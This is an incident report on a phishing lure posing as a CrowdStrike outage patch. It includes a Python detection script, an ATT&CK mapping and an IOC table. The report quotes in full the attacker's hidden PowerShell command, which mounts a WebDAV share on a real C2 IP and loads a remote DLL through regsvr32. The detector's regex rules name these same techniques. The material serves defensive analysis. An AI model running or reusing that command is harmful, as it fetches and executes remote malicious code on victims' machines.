PowerShell was executed with -windowstyle hidden on host Wilma. Investigation traced the origin to a phishing email impersonating a CrowdStrike outage patch notification. The email delivered crowdstrike.zip, which contained crowdstrike.bat — a batch script obfuscated using dictionary substitution (e.g., poisonlizard=set g), with malicious commands embedded within junk words.
The script launched wordpad.exe as a decoy process, then executed:

```text
powershell.exe -windowstyle hidden net use \\45.9.74.36@8888\davwwwroot\ ; regsvr32 /s \\45.9.74.36@8888\davwwwroot\1527830137078.dll
```
This attempted to mount a WebDAV share over port 8888 and register a remote DLL using regsvr32. No network logs confirmed a successful outbound connection to the C2.
Jul 24, 2024, 07:37 AM
The threat actor exploited widespread awareness of the CrowdStrike outage to craft a convincing lure, delivering a payload that used dictionary-substitution obfuscation to evade detection. The final stage leveraged regsvr32 — a signed Windows binary — to load a remote DLL, a classic Living Off the Land technique.
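As an added defender-side example (not part of the original report), the following Python flags the behaviours in that command chain in process-creation records: a hidden-window PowerShell launch, the \\host@port\ WebDAV UNC form, net use against a remote share, and regsvr32 given a UNC path or URL (the URL form goes slightly beyond what the report shows). The rule names, log format and sample records are constructed here; only the command line itself is taken from the report.

```python
import re
# Rule names are my own (hypothetical); the patterns follow the command chain described above.
RULES = {
    # powershell.exe launched with -windowstyle hidden (or an abbreviated -w / -win form)
    "powershell_hidden_window": re.compile(r"powershell(?:\.exe)?\b.*-w[a-z]*\s+hidden", re.I),
    # \\host@port\ or \\host@SSL\ is the WebDAV mini-redirector UNC form seen in the command
    "webdav_unc_path": re.compile(r"\\\\[^\\\s]+@(?:\d{1,5}|ssl)\\", re.I),
    # net use against a UNC path, with or without a drive letter
    "net_use_remote_share": re.compile(r"\bnet(?:1)?(?:\.exe)?\s+use\s+(?:[a-z]:\s+)?\\\\", re.I),
    # regsvr32 given a UNC path or URL (optionally via /i:) instead of a local DLL
    "regsvr32_remote_dll": re.compile(r"regsvr32(?:\.exe)?\s+(?:/\S+\s+)*(?:/i:)?(?:\\\\|https?://)", re.I),
}
SEVERITY = {1: "low", 2: "medium"}  # three or more rules on one command line -> high

def detect(cmdline: str) -> list[str]:
    """Return the names of every rule that fires on one process command line."""
    return [name for name, rx in RULES.items() if rx.search(cmdline)]

def parse_event(line: str) -> dict:
    """Parse a constructed 'time|host|image|commandline' record (not a real log format)."""
    ts, host, image, cmd = line.split("|", 3)
    return {"time": ts, "host": host, "image": image, "cmdline": cmd}

def triage(lines: list[str]) -> list[dict]:
    """Keep records that fire at least one rule; stacked hits on one line drive severity."""
    alerts = []
    for line in lines:
        ev = parse_event(line)
        hits = detect(ev["cmdline"])
        if hits:
            ev.update(hits=hits, severity=SEVERITY.get(len(hits), "high"))
            alerts.append(ev)
    return alerts

# Constructed sample records: only the PowerShell command line comes from the report above;
# timestamps, image paths and the benign entries are made up for the demonstration.
SAMPLE_EVENTS = [
    "2024-07-24T07:37:00Z|Wilma|C:\\Windows\\System32\\cmd.exe|cmd.exe /c crowdstrike.bat",
    "2024-07-24T07:37:01Z|Wilma|C:\\Program Files\\Windows NT\\Accessories\\wordpad.exe|wordpad.exe",
    "2024-07-24T07:37:02Z|Wilma|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|"
    "powershell.exe -windowstyle hidden net use \\\\45.9.74.36@8888\\davwwwroot\\ ; "
    "regsvr32 /s \\\\45.9.74.36@8888\\davwwwroot\\1527830137078.dll",
    "2024-07-24T08:00:00Z|Wilma|C:\\Windows\\System32\\regsvr32.exe|regsvr32.exe /s C:\\Windows\\System32\\vbscript.dll",
    "2024-07-24T08:01:00Z|Wilma|C:\\Windows\\System32\\net.exe|net use Z: \\\\fileserver\\share",
]

if __name__ == "__main__":
    for a in triage(SAMPLE_EVENTS):
        print(a["time"], a["host"], a["severity"], ",".join(a["hits"]))
```

A lone net use hit is routine in most estates and scores low here; the reported chain fires all four rules on a single command line, which is the signal worth paging on.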
| Technique ID | Tactic | Technique |
|---|---|---|
| T1566.001 | Initial Access | Phishing - Spearphishing Attachment |
| T1059.001 | Execution | PowerShell |
| T1027 | Defense Evasion | Obfuscated Files or Information |
| T1218.010 | Defense Evasion | Regsvr32 |
| T1105 | Command and Control | Ingress Tool Transfer |
| T1204.002 | Execution | User Execution - Malicious File |

| Type | Value |
|---|---|
| Email sender | support[@]crowdstrikeoutage[.]com |
| Archive | crowdstrike.zip |
| Script | crowdstrike.bat |
| C2 IP | 45.9.74.36 |
| C2 port | 8888 (WebDAV) |
| DLL | 1527830137078.dll |
| File hash (DLL) | 985a3d6900553536ab9e87d6ff64278f85f4abd865bc16f436846a3b47e9b1f6 |